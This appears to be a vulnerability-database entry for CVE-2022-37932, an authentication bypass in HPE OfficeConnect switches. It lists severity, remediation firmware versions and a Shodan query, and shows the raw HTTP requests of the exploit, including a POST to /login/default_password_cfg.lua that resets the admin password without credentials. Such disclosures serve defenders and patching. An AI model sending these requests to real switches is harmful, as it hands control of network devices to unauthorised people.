| Title | HP Switch - Authentication Bypass |
|---|---|
| Author | Phulelouch |
| Severity | High |
| Impact | Attackers on the adjacent network can bypass authentication on HP OfficeConnect switches without credentials, potentially gaining administrative access to modify switch configurations, intercept network traffic, or disrupt network operations. |
| Remediation | Update to HPE OfficeConnect switch firmware version PT.02.14 or later for 1820 series, PC.01.22 or later for 1850 series, or PO.01.21/PD.02.22 or later for 1920S series. |
| CVSS Score | 8.8 |
| EPSS Score | 0.79616 |
| CVE ID | CVE-2022-37932 |
| Shodan Query | html:"HPE OfficeConnect" |
| Tags | cve cve2022 hp officeconnect auth-bypass intrusive vkev vuln |
A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
POST /login/default_password_cfg.lua HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin&oldPwd=&newPwd=KWVMZuVI&confirmPwd=KWVMZuVI
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-37932.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-37932.pcap
N/AN/A